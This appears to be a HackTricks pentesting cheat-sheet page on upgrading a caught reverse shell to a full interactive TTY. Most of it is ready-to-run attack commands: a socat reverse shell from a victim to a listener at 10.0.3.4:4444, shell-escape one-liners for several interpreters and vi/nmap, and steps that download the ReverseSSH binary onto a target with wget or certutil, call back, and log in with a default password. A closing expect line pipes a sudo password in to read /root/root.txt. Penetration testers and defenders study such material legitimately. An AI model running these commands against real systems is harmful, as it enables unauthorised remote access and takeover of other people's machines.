Full TTYs
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Note that the shell you set in the
SHELL
variable must be listed inside /etc/shells or The value for the SHELL variable was not found in the /etc/shells file This incident has been reported
. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running bash
.python3 -c 'import pty; pty.spawn("/bin/bash")'
​
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
You can get the number of rows and columns executing
stty -a
script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
​
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
script -qc /bin/bash /dev/null
perl -e 'exec "/bin/sh";'
- perl:
exec "/bin/sh";
- ruby:
exec "/bin/sh"
- lua:
os.execute('/bin/sh')
- IRB:
exec "/bin/sh"
- vi:
:!bash
- vi:
:set shell=/bin/bash:shell
- nmap:
!sh
A convenient way for interactive shell access, as well as file transfers and port forwarding, is dropping the statically-linked ssh server ReverseSSH onto the target.
- 1.Prepare locally to catch the ssh port forwarding request:
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
​
/dev/shm/reverse-ssh -v -l -p 4444
- (2a) Linux target:
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
​
/dev/shm/reverse-ssh -p 4444 [email protected]
# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe
​
reverse-ssh.exe -p 4444 [email protected]
- If the ReverseSSH port forwarding request was successful, you should now be able to log in with the default password
letmeinbrudipls
in the context of the user runningreverse-ssh(.exe)
:
# Interactive shell access
ssh -p 8888 127.0.0.1
​
# Bidirectional file transfer
sftp -P 8888 127.0.0.1
If for some reason you cannot obtain a full TTY you still can interact with programs that expect user input. In the following example, the password is passed to
sudo
to read a file:expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Last modified 4mo ago